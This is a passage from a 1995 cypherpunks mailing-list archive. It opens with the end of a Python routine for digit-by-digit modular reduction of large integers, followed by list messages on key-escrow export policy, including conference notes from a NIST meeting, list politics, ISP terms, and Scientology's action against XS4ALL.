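        value >>= DIGIT_BITS
    return digits or [0]


def normalisation_shift(m):
    """Left shift (in bits) that makes the top radix-B digit of m >= B/2."""
    return -m.bit_length() % DIGIT_BITS


def reduce_one_digit_longer(r, m, m_len, m_top, stats):
    """Return r mod m for 0 <= r < m*B, i.e. r is at most one digit longer than m.

    The quotient is a single digit.  It is estimated from the two leading
    digits of r and the leading digit of m; the estimate is never too small,
    and with a normalised m it is at most 2 too large, so a couple of
    add-backs finish the job.
    """
    top2 = r >> (DIGIT_BITS * (m_len - 1))      # r_n * B + r_(n-1)
    qhat = min(top2 // m_top, B - 1)            # two-digit trial quotient
    r -= qhat * m
    fixes = 0
    while r < 0:                                # estimate was too large
        r += m
        fixes += 1
    stats["max_fixes"] = max(stats["max_fixes"], fixes)
    return r


def horner_mod(p, m):
    """Compute p mod m digit by digit: acc = (acc * x + a_i) mod m.

    Returns (remainder, stats).  The accumulator never grows beyond one digit
    more than the modulus, which is what makes the cheap trial quotient valid.
    """
    if m <= 0 or p < 0:
        raise ValueError("need p >= 0 and m > 0")
    s = normalisation_shift(m)
    m_n = m << s                                # (p << s) mod (m << s) == (p mod m) << s
    m_len = len(to_digits(m_n))
    m_top = m_n >> (DIGIT_BITS * (m_len - 1))
    stats = {"steps": 0, "max_fixes": 0}
    acc = 0
    for a in reversed(to_digits(p << s)):       # most significant digit first
        acc = reduce_one_digit_longer(acc * B + a, m_n, m_len, m_top, stats)
        stats["steps"] += 1
    return acc >> s, stats


def demo(seed=1995):
    """Reduce a constructed 2048-bit value by a constructed 1024-bit modulus."""
    rng = random.Random(seed)                   # constructed sample input
    p = rng.getrandbits(2048) | (1 << 2047)
    m = rng.getrandbits(1024) | (1 << 1023) | 1
    remainder, stats = horner_mod(p, m)
    return remainder == p % m, stats


if __name__ == "__main__":
    ok, stats = demo()
    print("matches built-in %:", ok)
    print("digit steps:", stats["steps"], "worst add-backs per step:", stats["max_fixes"])
```

One reduction is performed per digit of P and each costs a length-n multiply by a single digit, which is the O(n^2) behaviour the post mentions.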





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 7 Sep 95 01:37:22 PDT
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: ON OFF-TOPIC
In-Reply-To: <199509070639.BAA00416@mail.socketis.net>
Message-ID: <199509070834.EAA04213@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Was this really needed?

Gary Jeffers writes:
>                     ON  OFF-TOPIC
> 
>      THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Arnold <warnold@ptialaska.net>
Date: Sun, 10 Sep 95 17:22:38 PDT
Subject: Re: Wearing RSA shirt to school
In-Reply-To: <199509041203.IAA38469@tequesta.gate.net>
Message-ID: <42lvht$2br@news.dgsys.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm sorry.  I got into this thread late.  Where can I get a "munitions" 
t-shirt?  If anyone knows, please e-mail me with the info.  I'll wear it 
to work.  (I do telephones for a paycheck, and often work in "government" 
offices.)

Thank you very much for the info.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Sep 95 02:49:55 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Collection of personal info
In-Reply-To: <199509062144.RAA05718@cushing.bwh.harvard.edu>
Message-ID: <Pine.SUN.3.91.950907054538.15660A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Sep 1995, Adam Shostack wrote:

> 	No.  But the interesting question is, what to do about it?
> The answer in part, is personal anonymity through cash and avoiding US
> IDs.  But in the long run, that's broken.  You can't have privacy for
> 1000 people; they'll just toss us all in jail.

I doubt if TRW will throw you in jail for avoiding their database.  Last 
time I looked, it wasn't (very) illegal to avoid US IDs.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Sep 95 03:05:41 PDT
To: Buford Terrell <terrell@sam.neosoft.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <199509062335.SAA02364@sam.neosoft.com>
Message-ID: <Pine.SUN.3.91.950907060030.15660D-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Sep 1995, Buford Terrell wrote:

> How could crypto put lawyers out of business?  People would still
> have disagreements; plans would still go wrong; cars would still
> crash.  More important, transactions would still need to be 
> structured to carry out the desires of the parties while minimizing
> risks.
> 
> Good communications technology, including crypto, could make lawyering
> more efficient, but I suspect the savings would be minimal.

Well, if crypto reduces the role of government in human affairs, it will 
reduce work for lawyers.  Telecoms will certainly break the professional 
monopoly of lawyers (and other professionals).

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an116512@anon.penet.fi
Date: Wed, 6 Sep 95 23:54:39 PDT
To: cypherpunks@toad.com
Subject: not a flame please read and think about this
Message-ID: <9509070626.AA07408@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


why is it that half the
people who post here work for the government or big companies that are doing
governments bidding (rand.org (which is part of the nsa!) att.com (makers of the clipper chip)
mit (which owns rsa)
netscape etc etc)

what makes me wonder isnt so much that theyre here but that they post socalled
reasonable stuff that supports the government line.
like when these people report on
what the nsa guy says at the crypto convention as if were supposed to take it
seriously and these people who say clipper is good enough no back doors.
and then everyone takes this crap seriously.

obviously the government thinks there are some things we shouldnt think
about ourselves. and then someone comes along and says theyve thought about
it already and we should just go mind our own biz. arent we supposed to be
cypherPUNKS? then why do we need these people to think for us?

honest replies only please. i dont mean to flame but this really bothers me. we should maybe think about a closed list.




----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 7 Sep 95 03:27:43 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: not a flame please read and think about this
In-Reply-To: <9509070626.AA07408@anon.penet.fi>
Message-ID: <9509071027.AA15077@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I feel it's my civic duty to respond to these things, but there's nothing
new here. NOISE.

an116512@anon.penet.fi writes:
> why is it that half the
> people who post here work for the government or big companies that are doing
> governments bidding

*sigh* This line gets trotted out every few months here, like clockwork.
You should look for similar threads in the archives. Allow me to sum them up
for you, meanwhile: who cares ?  Perhaps it's because the government and big
corporations have (surprise) flocks of people working for them. Your 
assertion that fully 50% of the posters to the list overtly work for such 
organizations is patently absurd, anyway.  

[...]
> what makes me wonder isnt so much that theyre here but that they post 
> socalled reasonable stuff that supports the government line.
> like when these people report on what the nsa guy says at the crypto
> convention as if were supposed to take it seriously

What alternative do you propose ?  Are we merely to chuckle and say, "Oh,
those guys at the NSA are such kidders. As if they actually had any
influence on public policy decisions in the U.S.  What a hoot !"  ?

> and these people who say clipper is good enough no back doors.
> and then everyone takes this crap seriously.

Eh ?  David Sternlight isn't openly on the list; whom do you have in mind ?

> obviously the government thinks there are some things we shouldnt think
> about ourselves. 

(Agreed)

> and then someone comes along and says theyve thought about
> it already and we should just go mind our own biz. arent we supposed to be
> cypherPUNKS? then why do we need these people to think for us?

Unless you can be more specific about this, I really have no idea to what and
whom it refers.

> honest replies only please. i dont mean to flame but this really bothers me. 

BTW, if not for this line I wouldn't even have bothered replying.

> we should maybe think about a closed list.

Feel free -- no-one is stopping you or anyone else from creating one. You 
could even announce it here. I'll still be here listening to Matt Blaze,
Jim Gillogly, Derek Atkins, Jeff Weinstein, et al. But then again I've
worked at a govt. lab too, so I guess I wouldn't be welcome on your list
either. Darn.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 7 Sep 95 06:57:16 PDT
To: cypherpunks@toad.com
Subject: Re: What is truth?
Message-ID: <199509071356.GAA01805@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Crypto relevance:  Absolutely none:

At 10:57 PM 9/6/95 -0700, Timothy C. May wrote:
> If you want more information on my views about truth, check out 
> the work on "evolutionary epistemology," especially the writings 
> of William Bartley and Karl Popper.

Popper went off the deep end because he tried to justify science
without relying on the principle of induction, or its equivalent,
Bayesian probability.

A hopeless endeavor, like the attempt of the behaviorists 
to describe behavior without reference to intention, desire, 
and knowledge.

His reasoning leads logically to the polylogism of the
fascists, an outcome he imagines he avoided, but in fact 
he merely rephrased in language that superficially sounds 
more favorable to science.

Bayesian probability leads us to the conclusion that some 
scientific theories have a probability of truth that is 
exponentially close to unity.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 7 Sep 95 07:06:42 PDT
To: cypherpunks@toad.com
Subject: Re: not a flame please read and think about this
In-Reply-To: <9509070626.AA07408@anon.penet.fi>
Message-ID: <199509071406.HAA07763@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> an116512@anon.penet.fi writes:
> like when these people report on
> what the nsa guy says at the crypto convention as if were supposed to take it
...
> honest replies only please. i dont mean to flame but this really bothers me. 
>we should maybe think about a closed list.

Time to mark my calendar -- flamed on the same day by David Sternlight in
alt.security.pgp for espousing cypherpunk ideals and by an anonymous
person on C'punks for being a government stooge.  I must be doing
something right.

16 Halimath -- red letter day.

	Jim Gillogly
	Highday, 16 Halimath S.R. 1995, 14:05




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 7 Sep 95 04:26:42 PDT
To: dccp@eff.org
Subject: Notes from NIS&T Key Escrow Export conference.
Message-ID: <26714.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----


Here are my noted and remembered impressions from Wednesday's NIS&T 
conference on key escrow (aka GAK) export. Please note that there is 
a separate conference next week on creating a FIPS PUB standard for 
key escrow. That standard will be promulgated, just as GOSIP, POSIX 
and Clipper/Skipjack were promulgated. This export conference was 
separate from that FIPS standardization process.

I got stuck in a construction traffic jam, and missed the introductory
speeches. Perhaps one of the other c'punks can fill us all in on what I
missed.

The first item is that the export criteria will be changed. A small number
of bits will be added to unescrowed crypto, and 64-bit escrow'd (GAK'd)
systems will be allowed. They don't care which algorithm is used, DES, RC4,
blowfish, etc. They care about key length. If it is short enough, it is
exportable.

The conference seemed to be an attempt to co-opt industry into agreeing
that 64-bit GAK is much better than the current situation. After all,
it would be too strong for a "hacker in France" to break it.

When they opened the floor, there were a few comments/questions
that indicated that not everyone was convinced that this was a good thing.
I pointed out some graduate students don't consider "hacker" a compliment,
and that I thought Damian did a great job breaking RC4-40. I also pointed
out that it was broken again in 31 hours with a "bunch of commercial
systems, Sun and Pentiums" with no need for supercomputers. 

I then asked if the criteria were fixed, as setting criteria controls the
result. The NIS&T approved board said that changes to the criteria was 
part of why the conference was being held.

The next hour and a half was presentation from "industry." Essentially
comments on the proposal. Nearly all of the spokesmen said that the criteria
were flawed. Some said that they already had commercial products
that met most of the real needs of the industry (key recovery) but they
didn't meet the NIS&T/NSA "criteria." Probably the strongest was the
condemnation by Robert Holleyman of the Business Software Alliance.

Holleyman said that BSA represents firms such as Microsoft, Novell, Lotus,
Sybase, SCO, Autodesk, and Intergraph. He said that current policy "directly
threatens" the industry because of "The US Government's continuing refusal
to adopt realistic export control policies." He went on and on.
It was clear that his position is that the proposed policy is a mistake.

After the presentations, there were more questions. I proposed one
additional criteria (based on email that I received from the c'punks):
How do we expire court approved access to encrypted data, so that once the
court orders are over, the LEAs no longer have the ability to decrypt.
The answer was that with clipper, special hardware is needed, and it goes
away when the court order does. I asked how that model worked in a software
only world. There were mumbled statements about adding it as a criteria.

The conference then broke for lunch and breakout groups. The one I was in
discussed criterias 5 and 6 of Topic 3, published in my URL
http://www.isse.gmu.edu/~pfarrell/nistmeeting.html
They are short enough to reproduce here.

5.    The product shall be resistant to any alteration that would
      disable or circumvent the key escrow mechanism, to include
      being designed so that the key escrow mechanism cannot be
      disabled by a static patch, (i.e., the replacement of a
      block of code by a modified block).

6.    The product shall not decrypt messages or files encrypted
      by non-escrowed products, including products whose key
      escrow mechanisms have been altered or disabled.

After I commented that the person writing the notes has the ability to
determine what was said, the folks from NSA and NIS&T asked me to take 
the notes. I love it; but I did try to be objective.

In the middle of this discussion, a government-generated, but anonymous
paper was distributed. It had "Example Suggested Solutions." It suggested
that source code not be available for products suitable for export. It also
suggested other ideas, such as storing a checksum/hash and having the
system "check the cryptographic code several times during its use." There 
was a strong reaction against these suggestions, not because they were
bad ideas, but because the paper was delivered with no prior publication.
This precluded any planned response to its ideas.

We reworded #5 to say "want to Trust the Product." This means that it 
is untampered, works as expected, etc. We then hashed out ways to 
know this. The list ended up looking like:
1. is available only as object code
2. contains some "hash" function to check for modifications
3. contains some unique hash, with uniqueness based upon something 
        like "site," "per copy" or "per release" 
4. Contains policies against modification, such as license language
        against decompilation.
5. OS-related security, such as runs "protected mode" instead of as a 
        wild DOS program.

Of course, the software vendors went wild against "per copy" identifiers,
saying it would add two orders of magnitude worth of problems to 
manufacturing.

The items on the list were not "must have all of these" rather it was
a pick-and-choose menu. We also required that the standard allow
for technical innovation to keep up with the evolving state of the art.

The discussion of #6 was more lively. We took a long time figuring out what
it said. For instance, could ViaCrypt sell a product that was compatible
with PGP 2.6.2 (non-escrowed) that also worked with the new escrowed
ciphers? It seems to me, and a lot of other folks there, that such a product
would be non-exportable. We simplified the criteria to:
  "right products won't talk to wrong products."
with "right products" meaning those that are exportable, and wrong products
being those that aren't, or are hacked, or ...

We then developed "goals" including:
1. One version for sale worldwide
2. Allow development in the US
3. Domestic Law Enforcement Agencies want Escrowed (I almost wrote GAK :-)
4. Must interoperate with everything
5. Receiver can only decrypt if escrow agencies can decrypt.

This leads to a bunch of issues and observations, including:
a. Can goals 1, 2, and 4 be met simultaneously?

There was a suggestion of a "friendly man-in-the-middle" who would
receive a GAK'd conversation, and strip off the GAK parts, and reencrypt
it, and retransmit it to a non-GAK user. Which leads to:
b. Can we prohibit a friendly MITM?

The big issue was:
c. Startup compatibility. No one will buy products unless they have
sales attractiveness. This means compatibility with existing systems.
Yet the criteria #6 seems to say that approved products must refuse
backwards compatibility.

This was labeled a "non starter" by the group.

The consensus was that companies can develop a substantial competitive
advantage by developing off-shore and offering both escrowed encryption
and compatibility with existing systems.

There was a discussion of grandfathering in some technologies.
This was to help interoperability. The conversation became fuzzy,
Grandfather technologies included DES, 3-DES, IDEA, and long key RC4.

One key idea was that it may make sense to allow software that encrypts with
escrowed keys, but can also decrypt with any algorithm. This allows the LEA's
to access outgoing messages, while allowing interoperability.

The discussions frequently wandered to discuss the language of the criteria.
The wording was considered simultaneously too subjective  and impractical.
For example, we considered the phrase "tamper resistant" to be preferable 
to the original "prevent tampering," because it is impossible to absolutely
prevent modification to software.

The issue of interoperability was raised repeatedly. 
It is critical that exportable products interoperate with other,
existing export products. 

The last issue in the session was that the length of the key, 64-bits,
was defined in criteria #1. There was no discussion at the conference on
this criteria. It seems that the NIS&T and NSA folks believe that
this is a closed topic. The folks in the session did not agree. They
felt that 64-bits was not enough.

Once the breakout session was over, the entire conference met together, 
and the "reporter" from each session reported their comments and findings.

All breakout sessions had suggested changes. The group that discussed
criteria #9 recommended removing it. The group that discussed criteria #2 
(no multiple encryption) reported that industry was working on a general 
solution to the problem of key recovery, and that their solution would 
probably appear as quickly without the government's "help." 

Several groups identified that there are at least two separate 
problem domains: communications and data storage. Communications 
typically is short term, and has unique keys for each session. 
Data storage has far fewer keys that are used
for long periods. Several speakers suggested that while communications
keys were not suited to be escrowed, there was a large need for
key recovery for data storage. There was no response from the government
representatives to any of these points. One government speaker
did say that there would be a Federal key escrow standard, period.

After the combined session, there were more break-out sessions. In the one
that I attended, the folks from National Semiconductor described their
CAKE system. This is a smartcard/PCMCIA device that uses 2000+ bit 
public/private key encryption and signatures. They are hoping for export
approval; it is necessary for the project to be viable.  The system looks
pretty interesting, but it is too complicated to describe here. In short, 
random session keys are generated and signed with a Data Recovery Center's
public key. The LEAs could then send encrypted session keys to the DRC, 
which would decrypt them, and return the unencrypted session keys which
the LEA could then use to decrypt the messages.

While this is a hardware system, its concepts could be transferred to 
a software implementation.

One obvious problem is that NS' system doesn't meet criteria #8 (requiring
repeated involvement of the escrow agent), since it may require
hundreds or thousands of session key decipherments. It also has
a number of attractive features, such as never sending the private
key anywhere, only the session key is escrowed.

The general discussion showed concerns that in the international
community, requiring government escrow may cause loss of valuable data,
as some foreign governments are not as trustworthy as the US. It was
the consensus that requiring users to have 50 or more escrow centers was
unworkable. Yet this could be required for large multinational companies
working in 50 or more countries, if each required a local key escrow service.

The NS model would allow both date stamping of session keys, and periodic
rekeying. Either would satisfy my "unaccepted" Criteria #11, technical
limits to the time that a court ordered decryption could be executed.

There was a discussion of changing the criteria so that only the transmission
of data was concerned with escrow. This would simplify the issue of
multinational escrow. We did not resolve whether this would be sufficient
or acceptable.

Today, we will talk about suitable escrow agencies.

Pat


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBME7WOLCsmOInW9opAQHbawP+PSC+9p7ll7yKTiwnkzrIf+aT/ZfuoCqj
Fp6ZhykIoJQVF5YAEhz9O1t9FKOauo3baMDhaIvU4pUSm2b/hKlUFB8cwYr7KTjd
MFGxTOG/D7blGuX6ZXbHlS5EkKeT1pDtfrd9GlnTKWHxfga/51ROWCG/33BWZxHR
lyNLI07UPbo=
=kFkC
-----END PGP SIGNATURE-----

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 7 Sep 95 07:36:21 PDT
To: cypherpunks@toad.com
Subject: Re: Growth of actions definded as crime. Which math formula?
Message-ID: <199509071435.HAA04352@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:29 PM 9/6/95 -0700, Timothy C. May wrote:
> I've seen figures on the "linear feet" of regulations, and how they are
> growing exponentially, but I don't recall the numbers. Something like the
> total number of laws doubling every 10 years or so, but don't quote me on
> this one.

In addition one should also consider that most of these new crimes
are deliberately written to be sweeping and vague so that they can
be enforced in a selective and capricious manner:  For example
wetlands are deliberately defined in a way to give them considerable
elbow room, indeed so much elbow room that much of death valley
technically qualifies as wetlands.  The wetlands law was written 
to make it easy for bureaucrats to win lawsuits, not to reflect 
common sense or basic sanity.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 7 Sep 95 08:09:54 PDT
To: an116512@anon.penet.fi
Subject: Re: not a flame please read and think about this
In-Reply-To: <9509070626.AA07408@anon.penet.fi>
Message-ID: <Pine.SUN.3.91.950907074029.24168A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 7 Sep 1995 an116512@anon.penet.fi wrote:

> why is it that half the
> people who post here work for the government or big companies that are doing
> government's bidding (rand.org (which is part of the nsa!) att.com (makers of the clipper chip)
> mit (which owns rsa)
> netscape etc etc)

I doubt the statistics and I don't see how mere employment with
the above somehow disqualifies one for having a regard for 
privacy.  In many cases, they have a much better grasp of the
threat than the rest of us.

> what makes me wonder isn't so much that they're here but that they post so-called
> reasonable stuff that supports the government line.

This is nonsense.  Please give some examples of the sycophantic
posts you claim support "the government line."

> like when these people report on
> what the nsa guy says at the crypto convention as if we're supposed to take it
> seriously and these people who say clipper is good enough no back doors.
> and then everyone takes this crap seriously.

Who?  When?  To which "everyone" do you refer?

> . . . aren't we supposed to be
> cypherPUNKS?

What the hell is that supposed to mean?  The name was given and
accepted in jest.  I'm not aware of any special PUNK 
qualifications.  Please elucidate.

> then why do we need these people to think for us?

The Cypherpunks I know certainly don't; sorry to hear about you.

Are you planning to show up at Saturday's anniversary meeting
again, Larry?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 7 Sep 95 08:11:36 PDT
To: mark@lochard.com.au
Subject: Re: Scientology and police visit XS4ALL Amsterdam
Message-ID: <9509071507.AA08037@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> My personal view is co$ deserves all the flak they get.

I know who you're referring to by saying co$, but what does co$ mean?
Co-DollarSign?  Co-Dollar?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 7 Sep 95 08:22:03 PDT
To: Duncan Frissell <terrell@sam.neosoft.com>
Subject: Re: cryptography eliminates lawyers?
Message-ID: <199509071521.IAA07990@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:05 AM 9/7/95 -0400, Duncan Frissell wrote:
> Well, if crypto reduces the role of government in human affairs, it will 
> reduce work for lawyers.  Telecoms will certainly break the professional 
> monopoly of lawyers (and other professionals).

The functional equivalent of lawyers will still have a role.  When
an escrow agent allocates large chunks of money in some fashion,
and somebody says X was bad, and X says that Y was bad, and the
reputations are worth real money, we will need a public 
examination to determine what really happened.

And if governments collapse entirely, and we get full bore anarchy,
lawyers will have even more work because instead of a few reputations
being worth large sums of cash, everyone's reputation will be worth
life and limb.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Thu, 7 Sep 95 05:58:29 PDT
To: Deranged Mutant <rrothenb@ic.sunysb.edu>
Subject: Re: ECPA (Was: University logging mail to anon.penet.fi)
In-Reply-To: <199509070542.BAA23214@libws4.ic.sunysb.edu>
Message-ID: <IAA25764.199509071255@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199509070542.BAA23214@libws4.ic.sunysb.edu>, Deranged Mutant writes
[...]
>I've heard some nasty stories about boards and a couple of I-Net providers
>who charge for access but reserve the right to throw someone off the system
>without refund (it's often in the terms of many account applications) for
>various no-nos.

A lot do more or less that, but if you were an Internet Service
Provider how would you deal with it?  For example what if a customer
started sending obscene material to people who didn't want it, and
the recipients started to complain to you, or the government?

If you (the ISP) don't have a service agreement that says you can
disconnect the customer in that case you are in danger of getting
sued by them if you cut them off.  If you don't cut them off you
are in danger of getting sued or shut down by the government.

Even if we were in a more libertarian society you run the risk of
being boycotted by potential customers (of course the analogy breaks
down somewhat, in a very libertarian society you might be able to
run a profitable ISP selling to the very niche market of people who
want to threaten, harass, or generally make a nuisance of themselves).

As a result you are unlikely to find an ISP that doesn't have a set of no-no's.
(and if you do they may not be in business for long)  The best I think
you can do is find an ISP that publishes their list of no-no's (like
the one I work for UUNET - see any file in ftp://ftp.uu.net/uunet-info
with "svc" in its name and skip down to "AlterNet Terms and Conditions"),
and seems to have a reasonable set of them, and last but not least make
sure that they do at least refund any payment for service not received.

For example UUNET (which I work for - but this is mostly irrelevant as
this is a statement of the facts, not an opinion) publishes their
terms and conditions in ftp://ftp.uu.net/uunet-info (look at any file
with "svc" in its name and skip down to "AlterNet Terms and Conditions").
As for reasonability I'll leave that up to you to decide.
-- 
And no, I'm not speaking for UUNET Technologies, or anyone but myself.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Thu, 7 Sep 95 06:16:30 PDT
To: hallam@w3.org
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <9509061938.AA02249@zorch.w3.org>
Message-ID: <JAA25827.199509071316@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9509061938.AA02249@zorch.w3.org>, hallam@w3.org writes:
[...]
>People who go round drawing parallels to gun ownership and cryptography
>ownership are simply playing into the government's hands.

That could well be.  (that's as crypto relevant as this message
gets - sorry)

>                                                        Cryptography has net
>benefits to society. Most advocates of gun ownership tend to convince me of
>little more than they are a danger to society. Regardless of their case they
>are the biggest argument for gun control, and therefore poor advocates of their
>cause.    [...]

I'm sorry to see you say that, but rather than argue here I'll provide
a pointer to a fine set of arguments "A Nation of Cowards" by Jeffrey R. 
Snyder (the "nation" it refers to is the USA, not the UK).  Available
via the web <http://www.cs.cmu.edu/~karl/firearms/cowards.html>, enjoy
or not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Roth-Biester <derek@hagling.demon.co.uk> (by way of Duncan Frissell <frissell@panix.com>)
Date: Thu, 7 Sep 95 06:52:32 PDT
To: cypherpunks@toad.com
Subject: Cybersecurity
Message-ID: <199509071329.JAA06512@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


> >>	"Cybersecurity" - an investigation into cryptography, the
> >>	Internet, civil rights, Phil Zimmermann, PGP (and should we be
> >>	permitted to use it?) and so forth.
> >>

[My wife] and I watched this program - she found it very informative -
otherwise for me it wasn't anything new, other than to see Whitfield Diffie,
Phil Zimmermann and some porn star Cyberella being interviewed about
public/private key
encryption.  It was very much on the side of those seeking privacy, presenting
the government (even in the UK they are looking at mandatory key escrow, but
they haven't exactly told British subjects about it) as being underhand,
sneaking around to find ways of removing the privacy of the individual.  What 
they didn't say is that the debate is a moot point.  The technology is out there
and there ain't nothin' the guvmint can do about it.

Derek








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Wed, 6 Sep 95 20:49:19 PDT
To: cg@bofh.lake.de
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <m0sqR1Y-000Pa2C@bofh.lake.de>
Message-ID: <199509062303.AA24688@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>>      This is the second or third time I've seen descriptions of such
>>      raids where cult (no, I'm not trying to be diplomatic)
>>      representatives were present and participating.  Is this legal in
>>      Amsterdam?  How about in the U.S.?  Britain?
>> 
>Probably. Amsterdam isn't exactly the wild west, and they didn't take the
>computer equipment with them, they just inventoried everything so to have
>something to sell when their claims prove valid. Which I doubt (shit, I
>will be moving to this country in a couple of weeks...)

The good news is xs4all were prepared for them and have mounted a publicity
campaign against co$. co$ has withdrawn their complaint (though xs4all have
not been _officially_ notified yet) in an attempt to patch up things but it's
too late for co$ to save them from the wrath.

xs4all has a lot of support in all facets of .nl life so co$ is going to have
a bad time screwing with them. From what I learnt there will be a lot of noise
RSN in the press.

My personal view is co$ deserves all the flak they get.

Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 10:10:01 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Why Key Escrow (GAK) is So Bad
Message-ID: <ac746ec024021004a78f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:25 AM 9/4/95, Brian Davis wrote:
>On Fri, 1 Sep 1995, Timothy C. May wrote:

>> I absolutely agree with this, though this doesn't mean I'll stop worrying
>> about the government's plans for key escrow (GAK), about limits on key
>> lengths, or about other efforts to thwart strong security.
>
>I, of course, know of the "dislike" of GAK here.  I am curious to know,
>however, if the "dislike" is because government would have access under
>any circumstances or if the primary worry is that government will cheat
>and get access when most would agree that they shouldn't (either by the
>judge "cheating" or a TLA stealing it).
>
>In other words ... if it took agreement by a review board composed of
>non-LEA members of this list, would the escrow be acceptable??


[I'm addressing the basic issue of key escrow, or what Carl Ellison calls
"GAK" (Government Access to Keys), not the current debate in D.C. about
using some form of key escrow for exportable crypto. The debate on key
escrow is really about the crypto citizens will use, not what will be
allowed to be exported.]

Speaking for myself--though I think this captures the feelings of many--my
objection to GAK is on *principle*:

* No government can tell me what language I must communicate in and what
language I must _not_ communicate in.

David Sternlight has characterized this position as "childish," as the
whinings of spoiled children who don't want to be told what to do. If so,
then Thomas Jefferson was surely the biggest child of all, as he and his
